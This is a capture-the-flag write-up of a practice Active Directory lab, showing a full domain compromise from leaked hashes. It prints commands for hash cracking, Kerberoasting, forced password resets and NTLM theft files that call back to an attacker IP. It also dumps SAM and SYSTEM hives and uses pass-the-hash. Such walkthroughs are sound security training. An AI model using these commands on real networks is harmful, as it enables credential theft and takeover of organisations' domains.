Building Magic

AD Challenge Lab (Medium) - by Noah Heroldt & Haik Isikbay

CourseStackcourses.hacksmarter.org

The following post by 0xb0b is licensed under CC BY 4.0

---

This is the first machine release on Hack Smarter https://courses.hacksmarter.org/dashboard!

Initially, we are provided with the following scope and leaked database hashes:

Scope and Objective

Objective: As a penetration tester on the Hack Smarter Red Team, your objective is to achieve a full compromise of the Active Directory environment.

Initial Access: A prior enumeration phase has yielded a leaked database containing user credentials (usernames and hashed passwords). This information will serve as your starting point for gaining initial access to the network.

Execution: Your task is to leverage the compromised credentials to escalate privileges, move laterally through the Active Directory, and ultimately achieve a complete compromise of the domain.

*Note to user: *To access the target machine, you must add the following entries to your /etc/hosts file:

buildingmagic.local
dc01.buildingmagic.local

Leaked Database File:

id	username	full_name	role		password
1	r.widdleton	Ron Widdleton	Intern Builder	c4a21c4d438819d73d24851e7966229c
2	n.bottomsworth	Neville Bottomsworth Plannner	61ee643c5043eadbcdc6c9d1e3ebd298
3	l.layman	Luna Layman	Planner		8960516f904051176cc5ef67869de88f
4	c.smith		Chen Smith	Builder		bbd151e24516a48790b2cd5845e7f148
5	d.thomas	Dean Thomas	Builder		4d14ff3e264f6a9891aa6cea1cfa17cb
6	s.winnigan	Samuel Winnigan	HR Manager	078576a0569f4e0b758aedf650cb6d9a
7	p.jackson	Parvati Jackson	Shift Lead	eada74b2fa7f5e142ac412d767831b54
8	b.builder	Bob Builder	Electrician	dd4137bab3b52b55f99f18b7cd595448
9	t.ren		Theodore Ren	Safety Officer	bfaf794a81438488e57ee3954c27cd75
10	e.macmillan	Ernest Macmillan Surveyor	47d23284395f618bea1959e710bc68ef

Recon

The Nmap scan of 10.1.168.5 revealed numerous Windows/Active Directory-related services, including DNS 53, Kerberos 88/464, LDAP 389/636/3268/3269, SMB 139/445, RPC 135/593, and RDP 3389, alongside web services on ports 80 and 8080. This indicates the host is likely a domain controller with both directory services and a web application attack surface.

nmap -Pn 10.1.168.5   

The default script and service scan does not provide any further information, but only confirms the domains that are already known from the scope.

nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,8080 -Pn 10.1.168.5 

BUILDINGMAGIC.LOCAL
DC01.BUILDINGMAGIC.LOCAL

Access as r.widdleton

We continue cracking the existing hashes using hashcat and are able to crack only one password.

hashcat -a0 -m0 hashes.txt /usr/share/wordlists/rockyou.txt --username --show

Further hashes could be cracked using the site https://crackstation.net/.

From the Nmap scan, we know that SMB is available. We use NetExec and test the cracked passwords. We are successful with the user r.widdelton.

nxc smb 10.1.168.5 -u 't.ren' -p 'REDACTED' --shares

nxc smb 10.1.168.5 -u 'r.widdleton' -p 'REDACTED' --shares

We see that there is a share called File-Share, but we have neither read nor write access to it. But we have read access to the IPC$ share, which allows us to perform a rid brute force.

https://www.netexec.wiki/smb-protocol/enumeration/enumerate-users-by-bruteforcing-rid

Username Enumeration

We will see if we can find other users besides those with leaked credentials. To do this, we use the aforementioned rid bruteforce.

nxc smb 10.1.168.5 -u 'r.widdleton' -p 'REDACTED' --rid

And we are able to get the following users, which might come in handy later.

h.potch
r.widdleton
r.haggard
h.grangon
a.flatch

Access as r.haggard

With the credentials from r.widdleton, we continue with the enumeration and use Bloodhound for this purpose. Since I had problems with DNS timeouts, I used DNSChef for this case.

dnschef.py --fakeip 10.1.168.5 -q

We run the collectors script bloodhound-ce.py with the credentials of r.widdleton.

bloodhound-ce.py --zip -c All -d BUILDINGMAGIC.LOCAL -u r.widdleton -p REDACTED -dc DC01.BUILDINGMAGIC.LOCAL -ns 127.0.0.1

We feed the data into Bloodhound and analyse it using the available cypher queries and the OutBound Object Control relationships. We see that r.widdleton does not have any special permissions. But we find a Kerberosatbale user: r.haggard.

We use GetUserSPNs.py to Kerberoast the user using the credentials of r.widdleton. And we receive the Kerberos 5, etype 23, TGS-REP blob from r.haggard.

GetUserSPNs.py -dc-host DC01.BUILDINGMAGIC.LOCAL BUILDINGMAGIC.LOCAL/'r.widdleton':'REDACTED' -request

Fortunately, this could be cracked using hashcat. And we have now access as r.haggard.

hashcat -m13100 -a0 '<HASH>' /usr/share/wordlists/rockyou.txt

Access as h.potch

We take another look at the data we collected with Bloodhound. Let's take a closer look at r.haggard's Outbound Object Control. The user is able to change h.potch's password. The user h.potch does not appear to have any further permissions or usable relationships in Bloodhound, but we will see what else he can do in a moment.

Next, we change the password of h.potch with the credentials of r.haggerd using net rpc.

net rpc password 'h.potch' 'newP@ssword2022' -U 'BUILDINGMAGIC.LOCAL/r.haggard%REDACTED' -S DC01.BUILDINGMAGIC.LOCAL

We enumerate the shares using NetExec and see that we are now able to read and write to the share File-Share that we have already discovered.

nxc smb BUILDINGMAGIC.LOCAL -u 'h.potch' -p 'newP@ssword2022' --shares

Shell as h.grangon

However, the share appears to be empty.

smbclient //10.1.168.5/File-Share -U 'BUILDINGMAGIC.LOCAL\h.potch%newP@ssword2022'

But since we can write, we can try to place a file in the share that connects to us when opened or viewed in browser and reveals the hash of the calling user. This is called NTLM theft. There is already a handy tool for creating such files:

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHub

We prepare the files,

ntlm_thef.py --verbose --generate modern --server 10.200.0.156 --filename "meetingXYZ"

and set up resonder (with root privileges) to catch the request.

responder -I tun0

Next, we place the .lnk file in that share.

We get a connection with the NTLMv2-SSP of h.grangon.

Once again, we are able to crack the hash.

hashcat -m5600 -a0 '<HASH>' /usr/share/wordlist/rockyou.txt

In Bloodhound, we see that this user is in the Remote Management Users group. This allows us to connect to the machine using evil-winrm. Remember, port 5985 is open.

We connect to the machine using evil-winrm and find the first flag at C:\Users\h.grangon\Desktop\user.txt.

evil-winrm -i DC01.BUILDMAGIC.LOCAL -u 'h.grangon' -p 'REDACTED'

Shell as a.flatch

The user has a fatal permission: SeBackupPrivilege. This allows us to copy the SAM and SYSTEM hive. From this, we can then extract hashes using Impackets secretsdump.

whoami /priv

We save hives and download those using evil-winrm. The download of the SYSTEM hive via evil-winrm might take some time.

reg save HKLM\SAM "C:\Users\h.grangon\Documents\SAM"

reg save HKLM\SYSTEM "C:\Users\h.grangon\Documents\SYSTEM"

Next we dump the hashes using Impackets secretsdump. We are now in the possesion of the local Administrator hash. But it seems like it cannot be used using either of the Impacket exec tools like wmiexec.py or psexec.py nor evil-winrm.

secretsdump.py -sam './SAM' -system './SYSTEM' LOCAL

Recalling the users list gathered from the rid brute force we try the hash on all the users we know of and are successful with a.fletch.

nxc smb BUILDINGMAGIC.LOCAL -u users.txt -H REDACTED --continue-on-success

We see that this user is also an Administrator.

We connect to the machine as a.fletch using the hash.

And we find the final flag at C:\Users\Administrator\Desktop\root.txt.